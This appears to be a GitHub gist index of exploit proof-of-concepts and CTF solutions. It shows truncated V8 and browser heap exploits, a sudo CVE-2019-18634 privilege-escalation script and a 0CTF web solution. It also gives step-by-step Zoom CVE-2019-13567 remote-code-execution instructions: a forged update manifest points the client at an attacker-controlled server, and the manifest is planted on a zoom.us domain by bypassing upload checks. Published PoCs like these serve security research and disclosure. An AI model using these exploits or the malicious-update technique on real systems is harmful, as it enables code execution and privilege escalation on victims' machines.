
wbowling / pwn.js
Last active April 20, 2021 21:42
starCTF (*CTF) 2019 oob-v8
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
// Raw bytes of a WebAssembly module: the leading 0,97,115,109,1,0,0,0 is the
// "\0asm" magic plus version 1. The export section names a memory ("memory",
// bytes 109,101,109,111,114,121) and a function ("hello", bytes
// 104,101,108,108,111); the data segment at the end is the ASCII string
// "Hello World". The module itself is benign; it is only used below to obtain
// an exported function and memory from the engine.
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
// Compile and instantiate the module with no imports. Any byte-level
// corruption of wasm_code surfaces here as a WebAssembly.CompileError.
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
// The exported "hello" function (see the export section above).
let f = wasm_mod.exports.hello;
// Two arrays whose only difference is the element kind: arr1 holds a
// floating-point literal, arr2 holds an object (the Date constructor).
var arr1 = [1.1];
var arr2 = [Date];
// NOTE(review): Array.prototype.oob is not a standard JavaScript method. Given
// the gist title ("oob-v8"), it is presumably provided by the CTF's patched
// V8 build; on a stock engine these two calls throw a TypeError. What oob()
// returns is not visible here — confirm against the challenge's V8 patch
// before relying on the arr_map* values. The exploit depends on these
// allocations happening in exactly this order, so do not reorder them.
var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();
wbowling / README.md
Last active January 1, 2022 22:33
Zoom RCE - CVE-2019-13567

POC - https://youtu.be/zGSLBDo3N7s

  1. Create a malicious update manifest with the Package-url pointing to a server you control:
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
  1. Upload the manifest to a .zoom.us domain; one example is as the icon for a new https://marketplace.zoom.us/ app (there are client-side checks that it is an image, but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg
test
wbowling / CVE-2019-18634.py
Last active September 8, 2020 23:03
POC for CVE-2019-18634
#!/usr/bin/python
import os
import pty
from pwn import process, sleep, write, read, listen, p64
"""
From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401:
} else if (c == sudo_term_kill) {
wbowling / nativity_scene.js
Created May 11, 2020 14:13
Nativity Scene from SpamAndFlags CTF 2020
// Module-level state shared between the exploit stages. All three start out
// undefined; oob and oob_rw are assigned inside setup(), while base is not
// assigned anywhere in the visible code.
let oob;
let oob_rw;
let base;
function setup() {
oob = new Uint8Array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]);
oob_rw = new BigUint64Array([
0x1111111122222222n,
0x1111111122222222n,
0x1111111122222222n,
]);
wbowling / amp2020.py
Last active June 29, 2020 04:12
Solution to amp2020 from 0CTF/TCTF 2020 Quals
#!/usr/bin/env python
from pwn import *
import requests
import string
"""
* can add arbitrary html and pass the validator by adding a tag comment inside the <noscript> and close it
* axios uses `input` directly and we can make it an object allowing full param control
* cheerio needs a string, but axios tries to return the response as json. If you add `爀` and set the `responseEncoding` to `ascii` the json parsing fails and it returns text
wbowling / decrypt.py
Last active October 1, 2021 17:13
Decryptor for signalino - Midnight Sun CTF 2021
#!/usr/bin/env python3
"""
Based on https://github.com/xperylabhub/ios_keychain_decrypter/blob/d7f3089067816cd2adc1ce910c9e1b927a356f37/keychain_decrypt.py#L113
"""
import plistlib
from bpylist import archiver, archive_types
import dataclasses
from Crypto.Cipher import AES